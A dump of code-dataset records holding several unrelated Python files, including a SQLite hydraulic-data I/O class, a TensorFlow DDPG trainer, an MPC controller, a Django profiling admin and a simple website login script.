Locations;').fetchone()[0]\n descriptive_id = False\n self._close()\n \n return maxlocid, descriptive_id\n\n def get_max_location_id(self):\n \"\"\"\n Function to prepare a HRDLocations table for export, from a geopandas\n GeoDataFrame\n \"\"\"\n self._connect()\n maxlocid = self.conn.execute('SELECT MAX(LocationId) FROM Locations;').fetchone()[0]\n self._close()\n \n return maxlocid\n\n def check_element_presence(self, table, column, elements):\n \"\"\"\n Count the number of occurences of an element in a table\n \"\"\"\n if not isinstance(elements, list):\n raise TypeError('Unexpected type. Expected elements to be list.')\n \n self._connect()\n elementstr = ','.join(map(str, elements))\n sql = f'SELECT COUNT(*) FROM {table} WHERE {column} IN ({elementstr})'\n count = self.conn.execute(sql).fetchone()[0]\n self._close()\n\n return count\n\n def add_locations(self, result_locations):\n \"\"\"\n Modify the HLCD by removing old locations within the harbor and adding new\n locations. The HRD in needed for this function since it is used to determine\n the region.\n\n Parameters\n ----------\n result_locations : geopandas.GeoDataFrame\n GeoDataFrame with result locations\n conn : sqlite3.connection\n Connection to HLCD\n resultvariables : list\n List of result variables. Used for determining TypeOfHydraulicData\n \"\"\"\n \n result_loc_cols = ['LocationId', 'TypeOfHydraulicDataId', 'TrackId', 'HRDLocationId', 'InterpolationSupportId']\n if not set(result_locations.columns.tolist()).issuperset(set(result_loc_cols)):\n raise KeyError('Not all columns present to fill Location table.')\n \n Locations = pd.DataFrame(columns=[\n 'LocationId',\n 'TypeOfHydraulicDataId',\n 'TrackId',\n 'HRDLocationId',\n 'AreaNumber',\n 'InterpolationSupportId',\n 'ImplicInterpolationSupportId',\n 'ImplicPerformanceLevelSupportId'\n ])\n\n # Location ids\n Locations[result_loc_cols] = result_locations[result_loc_cols]\n\n # add to database\n self._connect()\n add_to_table('Locations', Locations, self.conn)\n self.conn.commit()\n self._close()\n\n def get_interpolation_support_id(self, systemid, supportlocid):\n\n self._connect()\n\n # find InterpolationSupportId in HLCD\n sql = f'SELECT InterpolationSupportId FROM Locations WHERE LocationId={systemid:1d}{supportlocid:05d};'\n interpolation_support_id = self.conn.execute(sql).fetchone()\n \n if interpolation_support_id is not None:\n interpolation_support_id = interpolation_support_id[0]\n\n self._close()\n\n return interpolation_support_id\n \n \n\nclass Configio:\n\n def __init__(self, path):\n\n self.path = path\n if not os.path.exists(path):\n raise OSError(f'Path \"{path}\" does not exist.')\n\n self.conn = None\n \n def _connect(self):\n self.conn = sqlite3.connect(self.path)\n\n def _close(self):\n self.conn.close()\n\n def remove_locations(self, remove_ids):\n \"\"\"\n Remove locations with corresponding calculation settings from config.\n\n Parameters\n ----------\n remove_ids : list\n List with LocationIds to be removes from database, together with\n corresponding data.\n \"\"\"\n\n remove_ids = ','.join(map(str, remove_ids))\n self._connect()\n self.conn.execute(f'DELETE FROM NumericsSettings WHERE LocationId IN ({remove_ids});')\n self.conn.execute(f'DELETE FROM TimeIntegrationSettings WHERE LocationID IN ({remove_ids});')\n self.conn.commit()\n self._close()\n \n def add_numerical_settings(self, locations):\n \"\"\"\n Add settings for numerics and time integration to config databasepath\n\n time integration\n calculationSchemeFBC = 1\n calculationSchemeAPT = 2\n --> calculationSchemeNTI = 3\n numerics\n methodFORM = 1\n methodCrudeMonteCarlo = 3\n methodDirectionalSampling = 4\n methodNumericalIntegration = 5\n methodImportanceSampling = 6\n methodFORMandDirSampling = 11\n --> methodDirSamplingWithFORMiterations = 12\n methodCrudeMonteCarloWithFORMiterations = 13\n methodImportanceSamplingWithFORMiterations = 14\n\n Parameters\n ----------\n locations : geopandas.GeoDataFrame\n GeoDataFrame with data to export\n conn : sqlite3.connection\n Connection to config\n \"\"\"\n\n self._connect()\n\n # Retrieve calculation settings for one location from database\n locationid = self.conn.execute('SELECT LocationId FROM NumericsSettings LIMIT 1;').fetchall()[0][0]\n NumericsSettings = pd.read_sql('SELECT * FROM NumericsSettings WHERE LocationId = {};'.format(locationid), self.conn)\n TimeIntegrationSettings = pd.read_sql('SELECT * FROM TimeIntegrationSettings WHERE LocationID = {};'.format(locationid), self.conn)\n\n # Set to heavy settings (methodDirSamplingWithFORMiterations and calculationSchemeNTI)\n NumericsSettings['CalculationMethod'] = 12\n TimeIntegrationSettings['TimeIntegrationSchemeID'] = 3\n\n # Stack for the number of locations to add\n length = len(NumericsSettings)\n NumericsSettings = pd.concat([NumericsSettings]*len(locations))\n NumericsSettings['LocationId'] = np.repeat(locations['LocationId'].squeeze().tolist(), length)\n add_to_table('NumericsSettings', NumericsSettings, self.conn)\n\n length = len(TimeIntegrationSettings)\n TimeIntegrationSettings = pd.concat([TimeIntegrationSettings]*len(locations))\n TimeIntegrationSettings['LocationID'] = np.repeat(locations['LocationId'].squeeze().tolist(), length)\n add_to_table('TimeIntegrationSettings', TimeIntegrationSettings, self.conn)\n\n self.conn.commit()\n\n self._close()\n","sub_path":"hbhavens/io/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":39946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97206484","text":"\n\nfrom xai.brain.wordbase.nouns._quarantine import _QUARANTINE\n\n#calss header\nclass _QUARANTINES(_QUARANTINE, ):\n\tdef __init__(self,): \n\t\t_QUARANTINE.__init__(self)\n\t\tself.name = \"QUARANTINES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"quarantine\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_quarantines.py","file_name":"_quarantines.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112654032","text":"import numpy as np\nfrom cost_functions import trajectory_cost_fn\nimport time\n\nclass Controller():\n def __init__(self):\n pass\n\n # Get the appropriate action(s) for this state(s)\n def get_action(self, state):\n pass\n\n\nclass RandomController(Controller):\n def __init__(self, env):\n \"\"\" YOUR CODE HERE \"\"\"\n self.env = env\n\n def get_action(self, state):\n \"\"\" YOUR CODE HERE \"\"\"\n \"\"\" Your code should randomly sample an action uniformly from the action space \"\"\"\n return self.env.action_space.sample()\n\nclass MPCcontroller(Controller):\n \"\"\" Controller built using the MPC method outlined in https://arxiv.org/abs/1708.02596 \"\"\"\n def __init__(self,\n env,\n dyn_model,\n horizon=5,\n cost_fn=None,\n num_simulated_paths=10,\n ):\n self.env = env\n self.dyn_model = dyn_model\n self.horizon = horizon\n self.cost_fn = cost_fn\n self.num_simulated_paths = num_simulated_paths\n num_action_candidates = self.num_simulated_paths*self.horizon\n self.action_candidates = np.array([self.env.action_space.sample() for i in range(num_action_candidates)]) # (num, action_dim)\n\n def get_action(self, state):\n \"\"\" YOUR CODE HERE \"\"\"\n \"\"\" Note: be careful to batch your simulations through the model for speed \"\"\"\n obs = state*np.ones((self.num_simulated_paths, state.shape[0])) # (paths, obs_dim)\n observations = [] # [(paths, obs_dim), ...]\n actions = [] # [(paths, action_dim), ...]\n next_observations = [] # [(paths, obs_dim), ...]\n\n for i in range(self.horizon):\n # sample from action candidates (instead of calling env.action_space.sample() every iteration)\n random_idx = np.random.choice(self.action_candidates.shape[0], obs.shape[0], replace=False)\n action = self.action_candidates[random_idx]\n #action = np.array([self.env.action_space.sample() for i in range(self.num_simulated_paths)])\n observations += [obs]\n actions += [action]\n obs = self.dyn_model.predict(obs, action)\n next_observations += [obs]\n\n costs = trajectory_cost_fn(self.cost_fn, observations, actions, next_observations) # (paths, )\n\n return actions[0][np.argmin(costs)]\n","sub_path":"hw4/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":2382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"161256569","text":"import logging\nimport logging.config\nimport sys\n\nFORMATTER = logging.Formatter(f\"[%(levelname)s]: [%(asctime)s] [%(lineno)d] [%(filename)s] [%(message)s]\")\nLOG_FILE = \"service.log\"\n\n\ndef get_console_handler():\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(FORMATTER)\n console_handler.setLevel(logging.INFO)\n return console_handler\n\n\n# def get_file_handler():\n# file_handler = TimedRotatingFileHandler(LOG_FILE)\n# file_handler.setFormatter(FORMATTER)\n# file_handler.setLevel(logging.INFO)\n# return file_handler\n\n\ndef set_up_logging():\n logger = logging.getLogger(__name__)\n if not logger.hasHandlers():\n logger.setLevel(logging.DEBUG)\n logger.addHandler(get_console_handler())\n # logger.addHandler(get_file_handler())\n logger.propagate = False\n return logger\n","sub_path":"src/main_logger.py","file_name":"main_logger.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"245785267","text":"def ordered_vowel_words(string):\n words=string.split()\n unordered_vowels_list = []\n for word in words:\n vowel_list = []\n for letter in word:\n if letter in \"aeoui\":\n vowel_list.append(letter)\n for num in range(1,len(vowel_list)):\n if vowel_list[num] < vowel_list[num - 1]:\n unordered_vowels_list.append(word)\n newList = []\n for word in words:\n if word not in unordered_vowels_list:\n newList.append(word)\n \n \n return newList\n\"\"\"\nrequire '03_ordered_vowels'\nrequire 'rspec'\n\n# Write a method, `ordered_vowel_words(str)` that takes a string of\n# lowercase words and returns a string with just the words containing\n# all their vowels (excluding \"y\") in alphabetical order. Vowels may\n# be repeated (`\"afoot\"` is an ordered vowel word).\n#\n# You will probably want a helper method, `ordered_vowel_word?(word)`\n# which returns true/false if a word's vowels are ordered.\n#\n# Difficulty: 2/5\n\ndescribe \"#ordered_vowel_words\" do\n it \"returns a word that is in order\" do\n ordered_vowel_words(\"amends\").should == \"amends\"\n end\n\n it \"does not return a word that is not in order\" do\n ordered_vowel_words(\"complicated\").should == \"\"\n end\n\n it \"handles double vowels\" do\n ordered_vowel_words(\"afoot\").should == \"afoot\"\n end\n\n it \"handles a word with a single vowel\" do\n ordered_vowel_words(\"ham\").should == \"ham\"\n end\n\n it \"handles a word with no vowel\" do\n ordered_vowel_words(\"crypt\").should == \"crypt\"\n end\n\n it \"handles a word with a single letter\" do\n ordered_vowel_words(\"o\").should == \"o\"\n end\n\n it \"ignores the letter y\" do\n ordered_vowel_words(\"tamely\").should == \"tamely\"\n end\n\n it \"processes a string with several words\" do\n phrase = \"this is a test of the vowel ordering system\"\n result = \"this is a test of the system\"\n\n ordered_vowel_words(phrase).should == result\n end\nend\n\"\"\"","sub_path":"Python/App Academy Exercise/practice-problems2/my solutions in python/03_ordered_vowels_spec.py","file_name":"03_ordered_vowels_spec.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291795153","text":"import numpy as np\nfrom pg_utils import *\nimport tensorflow as tf\nimport gym\nimport logz\nimport time\nimport inspect\nfrom memory import Memory\nimport os\n\n#todo add action_noise\n#todo add every normalize denormalize\n#todo mpi, optimizer minimize to grad and update, for mpi\n\nclass DDPG(object):\n def setup_placeholders(self):\n # placeholders\n # Prefixes and suffixes:\n # ob - observation\n # ac - action\n # _no - this tensor should have shape (batch size /n/, observation dim)\n # _na - this tensor should have shape (batch size /n/, action dim)\n # _n - this tensor should have shape (batch size /n/)\n # placeholders前面都加一个前缀是好文明,可以方便在之后区分variable和placeholder\n self.sy_ob_no = tf.placeholder(tf.float32, shape=[None, self.ob_dim], name=\"ob\")\n self.sy_ob_next = tf.placeholder(tf.float32, shape=[None, self.ob_dim], name=\"ob_next\")\n self.terminal_next = tf.placeholder(tf.float32, shape=[None, 1], name=\"terminal_next\")\n self.sy_rewards = tf.placeholder(tf.float32, shape=[None, 1], name=\"sy_rewards\")\n self.sy_critic_targets = tf.placeholder(tf.float32, shape=[None, 1], name=\"sy_critic_targets\")\n self.param_noise_stddev = tf.placeholder(tf.float32, shape=(), name='param_noise_stddev')\n # actions的维度为整个actions选择的概率,而不只是输出一个被选择的action\n # tensorforce是按以下实现的,因此应该也是输入的概率\n # x_actions = tf.reshape(tf.cast(x_actions, dtype=tf.float32), (-1, 1))\n # 现在的问题是cartpole返回的shape是一个() 空tuple 但实际上应该是两个action 感觉应该是个bug\n self.sy_actions = tf.placeholder(tf.float32, shape=[None, self.ac_dim], name='actions')\n\n def setup_network(self):\n # 指定Reuse即可reuse同一个scope下的网络参数 self.actor返回一个tensor,表示选择每个action的概率\n self.actor_tf = build_actor(self.sy_ob_no, self.ac_dim, scope_name='actor')\n # 默认axis为0 会返回[0,0],即沿着第0维归一化,由于只有一个数,因此固定返回0,0\n # tf.argmax返回一个[1] 的tensor 使用tf.squeeze规约为int 否则env.step会检查不通过\n self.actor_choose_action = tf.squeeze(tf.argmax(self.actor_tf, axis=1))\n # target 输入下一次的ob\n self.target_actor_tf = build_actor(self.sy_ob_next, self.ac_dim, scope_name='target_actor')\n\n # 输入的是action的placeholder 这里可以选择输入action的选择概率,即actor_network的原始输出\n # 也可以选择输入argmax之后的action index\n self.critic_tf = build_critic(self.sy_ob_no, self.sy_actions, scope_name='critic')\n # 输入的是模型的action概率分布,将这个输入到critic的第二层,也算是actor和critic共用一部��参数\n # critic_tf和critic_with_actor_tf使用同一个网络,只是输入的action不同\n self.critic_with_actor_tf = build_critic(self.sy_ob_no, self.actor_tf, scope_name='critic', reuse=True)\n # 计算next_q时用的是target_actor的输出作为actor部分的输入\n next_q = build_critic(self.sy_ob_next, self.target_actor_tf, scope_name='target_critic')\n # terminal_next如果是tf.int32的placeholder,则会报 *\n self.target_q = self.sy_rewards + (1 - self.terminal_next) * self.gamma * next_q\n\n # setup var updates\n actor_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='actor')\n target_actor_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='target_actor')\n critic_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='critic')\n target_critic_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='target_critic')\n actor_init_updates, actor_soft_updates = get_target_updates(actor_vars, target_actor_vars, self.tau)\n critic_init_updates, critic_soft_updates = get_target_updates(critic_vars, target_critic_vars, self.tau)\n self.target_init_updates = [actor_init_updates, critic_init_updates]\n self.target_soft_updates = [actor_soft_updates, critic_soft_updates]\n\n # setup loss\n self.actor_loss = -tf.reduce_mean(self.critic_with_actor_tf)\n # 构造AdamOptimizer.minimize之后,会让actor_vars中的参数膨胀两倍,因此需要先设置updates,再设置loss\n self.actor_update_op = tf.train.AdamOptimizer(self.actor_lr).minimize(self.actor_loss)\n self.critic_loss = tf.reduce_mean(tf.square(self.critic_tf-self.sy_critic_targets))\n self.critic_update_op = tf.train.AdamOptimizer(self.critic_lr).minimize(self.critic_loss)\n\n\n def __init__(self,\n env=None,\n discrete=True,\n ob_shape=(),\n ac_dim=0,\n gamma=1.0,\n actor_lr=1e-4,\n critic_lr=1e-3,\n logdir=None,\n normalize_returns=True,\n # network arguments\n n_layers=1,\n size=32,\n gae_lambda=-1.0,\n tau=0.001 #parameter update rate\n ):\n self.gamma = gamma\n self.actor_lr = actor_lr\n self.critic_lr = critic_lr\n self.normalize_returns = normalize_returns\n self.n_layers = n_layers\n self.size = size\n self.gae_lambda = gae_lambda\n self.tau = tau\n\n # Configure output directory for logging\n logz.configure_output_dir(logdir)\n # Log experimental parameters\n # args = inspect.getfullargspec(train_DDPG)[0]\n # locals_ = locals()\n # params = {k: locals_[k] if k in locals_ else None for k in args}\n # logz.save_params(params)\n\n # Make the gym environment\n self.env = env\n # Is this env continuous, or discrete?\n self.discrete = discrete\n self.ac_dim = ac_dim\n self.ob_dim = ob_shape[0]\n #observation_shape in cartpole is (2,) 一个tuple\n self.memory = Memory(limit=int(1e6), action_shape=ac_dim, observation_shape=ob_shape)\n self.setup_placeholders()\n self.setup_network()\n\n def sample_action(self,obs,compute_Q=True):\n feed_dict = {self.sy_ob_no:[obs]}\n # baseline的代码中这里直接输出action的选择概率,而且传入env.step时乘以env.high 应该是用于连续action的做法\n # 而我们求argmax则是用于离散action的做法\n # build_critic(self.sy_ob_no, self.actor_tf, scope_name='critic', reuse=True) critic传入的是actor的输出\n if compute_Q:\n action, action_prob, q = self.sess.run([self.actor_choose_action, self.actor_tf, self.critic_with_actor_tf], feed_dict=feed_dict)\n else:\n action, action_prob = self.sess.run([self.actor_choose_action, self.actor_tf], feed_dict=feed_dict)\n q = None\n\n # 去除多余的维度,并限制在-1到1之间\n action_prob = action_prob.flatten()\n action_prob = np.clip(action_prob, -1., 1.)\n return action, action_prob, q\n\n def soft_sync_target_actor(self):\n self.sess.run(self.target_soft_updates)\n\n def store_transition(self, obs0, action, reward, obs1, terminal1):\n self.memory.append(obs0, action, reward, obs1, terminal1)\n\n # 相当于baseline.ddpg.train 执行一次更新,\n def update_loss(self):\n batch = self.memory.sample(batch_size=self.batch_size)\n\n target_Q = self.sess.run(self.target_q, feed_dict={\n self.sy_ob_next: batch['obs1'],\n self.sy_rewards: batch['rewards'],\n self.terminal_next: batch['terminals1'].astype('float32'),\n })\n ops = [self.actor_loss, self.critic_loss, self.actor_update_op, self.critic_update_op]\n actor_loss, critic_loss, _, _ = self.sess.run(ops, feed_dict={\n self.sy_ob_no: batch['obs0'],\n self.sy_actions: batch['actions'],\n self.sy_critic_targets: target_Q,\n })\n\n return critic_loss, actor_loss\n\n # 完整的训练流程\n def train(self,\n seed=0,\n n_iter=100,\n animate=False,\n min_timesteps_per_batch=1000,\n batch_epochs=1,\n batch_size = 32,\n max_path_length=None,\n ):\n self.batch_size = batch_size\n start = time.time()\n # Set random seeds\n tf.set_random_seed(seed)\n np.random.seed(seed)\n # Maximum length for episodes\n max_path_length = max_path_length\n tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)\n\n sess = tf.Session(config=tf_config)\n self.sess = sess\n sess.__enter__() # equivalent to `with sess:`\n tf.global_variables_initializer().run() # pylint: disable=E1101\n sess.run(self.target_init_updates)\n # todo: use finalize to make sure no new node in graph\n #sess.graph.finalize() #make it readonly, speed up\n # ========================================================================================#\n # Training Loop\n # ========================================================================================#\n #max_action = self.env.action_space.high\n total_timesteps = 0\n\n for itr in range(n_iter):\n #print('start train itr=%d max_step=%d batch=%d'%(itr, max_path_length, min_timesteps_per_batch))\n # Collect paths until we have enough timesteps\n # 每一轮结束或者超过max_path_length时会结束一次path\n # 每一轮path结束后填充到paths中,检查一次总的batch步数是否超过batch需求数,超过了则退出,开始训练\n # 因此每次训练的都是完整的数据\n\n # PG算法每次都使用当前分布sample action,不涉及exploration\n # TODO 改成observation和train分开两个进程,这样不用互相等待\n timesteps_this_batch = 0\n paths = []\n while True:\n ob = self.env.reset()\n #obs, acs, ac_probs, rewards, ob_nexts, dones = [], [], [], [], [], []\n obs, acs, rewards, ob_nexts, dones = [], [], [], [], []\n animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and animate)\n steps = 0\n while True:\n if animate_this_episode:\n self.env.render()\n time.sleep(0.05)\n obs.append(ob)\n # eval_obs, eval_r, eval_done, eval_info = eval_env.step(max_action * eval_action)\n # scale for execution in env (as far as DDPG is concerned, every action is in [-1, 1])\n # baseline将action限制在-1,1 再scale 可以看下这样是否有必要\n if self.discrete:\n ac, ac_prob, q = self.sample_action(ob, False)\n acs.append(ac)\n ob_next, rew, done, _ = self.env.step(ac)\n else:\n _, ac_prob, q = self.sample_action(ob, False)\n #ac_prob = tf.Print(ac_prob, [ac_prob, ac_prob.shape], 'sample action')\n acs.append(ac_prob)\n ob_next, rew, done, _ = self.env.step(ac_prob)\n #ac_probs.append(ac_prob)\n\n ob_nexts.append(ob_next)\n dones.append(done)\n rewards.append(rew)\n self.store_transition(ob, ac_prob, rew, ob_next, done)\n steps += 1\n if done or steps > max_path_length:\n break\n path = {\"observation\": np.array(obs),\n \"reward\": np.array(rewards),\n \"action\": np.array(acs),\n \"ob_next\": np.array(ob_nexts),\n \"done\": np.array(dones)}\n paths.append(path)\n timesteps_this_batch += pathlength(path)\n if timesteps_this_batch > min_timesteps_per_batch:\n break\n total_timesteps += timesteps_this_batch\n\n # Build arrays for observation, action for the policy gradient update by concatenating\n # across paths\n ob_no = np.concatenate([path[\"observation\"] for path in paths])\n ac_na = np.concatenate([path[\"action\"] for path in paths])\n\n # todo train process\n # todo memory sample in paths\n epoch_actor_losses = []\n epoch_critic_losses = []\n for epoch in range(batch_epochs):\n cl, al = self.update_loss()\n epoch_critic_losses.append(cl)\n epoch_actor_losses.append(al)\n self.soft_sync_target_actor()\n # Log diagnostics\n returns = [path[\"reward\"].sum() for path in paths]\n ep_lengths = [pathlength(path) for path in paths]\n #print('log iter %d'%itr)\n #logz.log_tabular(\"LossDelta\", loss_1 - loss_2)\n logz.log_tabular(\"Time\", time.time() - start)\n logz.log_tabular(\"Iteration\", itr)\n logz.log_tabular(\"AverageReturn\", np.mean(returns))\n logz.log_tabular(\"StdReturn\", np.std(returns))\n logz.log_tabular(\"MaxReturn\", np.max(returns))\n logz.log_tabular(\"MinReturn\", np.min(returns))\n logz.log_tabular(\"EpLenMean\", np.mean(ep_lengths))\n logz.log_tabular(\"EpLenStd\", np.std(ep_lengths))\n logz.log_tabular(\"TimestepsThisBatch\", timesteps_this_batch)\n logz.log_tabular(\"TimestepsSoFar\", total_timesteps)\n logz.dump_tabular()\n logz.pickle_tf_vars()\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('env_name', type=str)\n parser.add_argument('--exp_name', type=str, default='ddpg')\n parser.add_argument('--render', action='store_true')\n parser.add_argument('--discount', type=float, default=1.0)\n parser.add_argument('--n_iter', '-n', type=int, default=1000)\n parser.add_argument('--batch_size', '-b', type=int, default=1000)\n parser.add_argument('--ep_len', '-ep', type=float, default=-1.)\n parser.add_argument('--actor_learning_rate', '-alr', type=float, default=5e-5)\n parser.add_argument('--critic_learning_rate', '-clr', type=float, default=5e-4)\n parser.add_argument('--critic_update_tau', '-tau', type=float, default=0.001)\n parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')\n parser.add_argument('--seed', '-seed', type=int, default=1)\n parser.add_argument('--n_experiments', '-e', type=int, default=1)\n parser.add_argument('--n_layers', '-l', type=int, default=1)\n parser.add_argument('--size', '-s', type=int, default=32)\n parser.add_argument('--gae_lambda', '-gae', type=float, default=-1.0)\n parser.add_argument('--batch_epochs', '-be', type=int, default=1)\n args = parser.parse_args()\n\n if not (os.path.exists('data')):\n os.makedirs('data')\n logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime(\"%d-%m-%Y_%H-%M-%S\")\n logdir = os.path.join('data', logdir)\n if not (os.path.exists(logdir)):\n os.makedirs(logdir)\n\n env = gym.make(args.env_name)\n discrete = isinstance(env.action_space, gym.spaces.Discrete)\n max_path_length = args.ep_len if args.ep_len > 0 else env.spec.max_episode_steps\n ob_shape = env.observation_space.shape\n ac_dim = env.action_space.n if discrete else env.action_space.shape[0]\n\n # for e in range(args.n_experiments):\n # seed = args.seed + 10*e\n # print('Running experiment with seed %d'%seed)\n # def train_func():\n # train_PG(\n # exp_name=args.exp_name,\n # env_name=args.env_name,\n # n_iter=args.n_iter,\n # gamma=args.discount,\n # min_timesteps_per_batch=args.batch_size,\n # max_path_length=max_path_length,\n # learning_rate=args.learning_rate,\n # reward_to_go=args.reward_to_go,\n # animate=args.render,\n # logdir=os.path.join(logdir,'%d'%seed),\n # normalize_advantages=not(args.dont_normalize_advantages),\n # nn_baseline=args.nn_baseline,\n # seed=seed,\n # n_layers=args.n_layers,\n # size=args.size\n # )\n # # Awkward hacky process runs, because Tensorflow does not like\n # # repeatedly calling train_PG in the same thread.\n # p = Process(target=train_func, args=tuple())\n # p.start()\n # p.join()\n\n seed = args.seed\n print('Running experiment with seed %d' % seed)\n ddpg = DDPG(\n env=env,\n discrete=discrete,\n ac_dim=ac_dim,\n ob_shape=ob_shape,\n gamma = args.discount,\n actor_lr=args.actor_learning_rate,\n critic_lr=args.critic_learning_rate,\n logdir=os.path.join(logdir, '%d' % seed),\n normalize_returns=not (args.dont_normalize_advantages),\n # network arguments\n n_layers=args.n_layers,\n size=args.size,\n gae_lambda=args.gae_lambda,\n tau=args.critic_update_tau,\n )\n ddpg.train(\n n_iter=args.n_iter,\n seed=seed,\n min_timesteps_per_batch=args.batch_size,\n animate=args.render,\n batch_epochs=args.batch_epochs,\n batch_size=args.batch_size,\n max_path_length=max_path_length\n )\n\nif __name__ == \"__main__\":\n main()","sub_path":"hw2/train_ddpg.py","file_name":"train_ddpg.py","file_ext":"py","file_size_in_byte":17851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"428005948","text":"from django.contrib import admin\nfrom django.conf.urls import patterns, url\nfrom django.contrib.admin import helpers\nfrom django.contrib.admin.util import unquote\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404, HttpResponse\nfrom django.template.response import TemplateResponse\n\nfrom dprofiling.forms import StatsForm\nfrom dprofiling.models import Session, Profile\nfrom dprofiling.backends import get_backend\n\n\n\n\n\nclass SessionAdmin(admin.ModelAdmin):\n list_display = ('name', 'path', 'active', 'stats_link')\n list_filter = ('active',)\n\n def stats_link(self, obj):\n return 'Stats' % (reverse('admin:dprofiling_session_stats',\n args=(obj.pk,)),)\n\n stats_link.allow_tags = True\n stats_link.short_description = 'Cumulative Stats'\n\n def get_urls(self):\n urls = super(SessionAdmin, self).get_urls()\n info = (self.model._meta.app_label,\n self.model._meta.module_name)\n session_urls = patterns('',\n url(r'^(.+)/stats/$',\n self.admin_site.admin_view(self.stats_view),\n name='%s_%s_stats' % info),\n )\n return session_urls + urls\n\n def stats_view(self, request, object_id, extra_context=None):\n \"\"\" Render a view for selecting details before printing stats \"\"\"\n opts = self.model._meta\n app_label = opts.app_label\n backend = get_backend()\n if not callable(getattr(backend, 'get_stats', None)):\n raise Exception('Current backend does not support getting '\n 'aggregate stats')\n obj = self.get_object(request, unquote(object_id))\n\n if obj is None:\n raise Http404('Stats object does not exist')\n\n if request.method == 'POST':\n form = StatsForm(request.POST)\n if form.is_valid():\n data = form.cleaned_data\n stats, output = backend.get_stats(obj)\n if not stats:\n raise Http404('No stats collected for this object')\n if data['strip_dirs']:\n stats.strip_dirs()\n if data['sort']:\n stats.sort_stats(*data['sort'])\n if data['reverse_sort']:\n stats.reverse_order()\n method = getattr(stats, 'print_%s' % (data['method'],))\n method(*data['restrictions'])\n return HttpResponse(output.getvalue(),\n content_type='text/plain')\n else:\n form = StatsForm()\n\n adminform = helpers.AdminForm(form,\n [\n (None, {'fields':[\n 'sort','reverse_sort','strip_dirs', 'restrictions','method']\n }),\n ], {})\n\n context = {\n 'title': 'Stats for %s' % obj.name,\n 'adminform': adminform,\n 'object_id': object_id,\n 'original': obj,\n 'is_popup': \"_popup\" in request.REQUEST,\n 'errors': helpers.AdminErrorList(form, None),\n 'app_label': opts.app_label,\n 'opts': opts,\n 'add': False,\n }\n context.update(extra_context or {})\n return TemplateResponse(request,\n ['admin/dprofiling/session/stats_form.html'], context,\n current_app=self.admin_site.name)\n\n\n\nclass ProfileAdmin(admin.ModelAdmin):\n pass\n\nadmin.site.register(Session, SessionAdmin)\nadmin.site.register(Profile, ProfileAdmin)\n\n","sub_path":"dprofiling/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"245575635","text":"#!/usr/bin/python\n#################################################################\nimport csv\nfrom Attributes import RealAttr, CategoricalAttr, StringAttr\nfrom Case import Case\n\n\"\"\" file with functions to read csv files \"\"\"\n\ndef readCurrentCase(row, types, names):\n attrs = {}\n for i in xrange(0, len(types)):\n if types[i] == 'r':\n attrs[names[i]] = RealAttr(row[i])\n elif types[i] == 'c':\n attrs[names[i]] = CategoricalAttr(row[i])\n elif types[i] == 's':\n attrs[names[i]] = StringAttr(row[i])\n\n else:\n raise Exception('wrong item on input')\n\n #attrs contains the attributes of the case\n return Case(attrs)\n\ndef readCase(row, types, names, label_name):\n attrs = {}\n for i in xrange(0, len(types)):\n if types[i] == 'r':\n attrs[names[i]] = RealAttr(row[i])\n elif types[i] == 'c':\n attrs[names[i]] = CategoricalAttr(row[i])\n elif types[i] == 's':\n attrs[names[i]] = StringAttr(row[i])\n\n else:\n raise Exception('wrong item on input')\n\n #attrs contains the attributes of the case\n label = attrs[label_name]\n attrs.pop(label_name)\n return Case(attrs, {label_name : label})\n\ndef readCasesFromCsv(filename, types, names, label_name):\n cases = []\n m = len(types)\n with open(filename, 'rb') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n if row:\n if len(row) != m:\n raise Exception('the elements of the csv are not '\\\n 'consistent with the structure provided.')\n case = readCase(row, types, names, label_name)\n cases.append(case)\n return cases\n","sub_path":"deliverable/source_code/readingCsv.py","file_name":"readingCsv.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"203432131","text":"import requests\nfrom fake_useragent import UserAgent\nfrom config import name, pwd\n\nua = UserAgent(verify_ssl=False)\n# 随机选择 User-Agent ,random 是实例的属性\n# Referer 说明你是从哪里来的\n# x-requested-with 防止 crsf\n\nheaders = {\n 'User-Agent': ua.random,\n 'Referer': 'https://shimo.im/login?from=home',\n 'x-requested-with': 'XmlHttpRequest'\n}\n\ns = requests.Session()\n\nlogin_url = 'https://shimo.im/login?from=home'\n\nform_data = {\n 'ck': '',\n 'name': name,\n 'password': pwd,\n 'remember': 'true'\n}\n\nresp = s.post(login_url, data=form_data, headers=headers, cookies=s.cookies)\n\nprint(resp.status_code)\n\n# 验证登录是否成功,\nresp = s.get('https://shimo.im/dashboard/favorites', 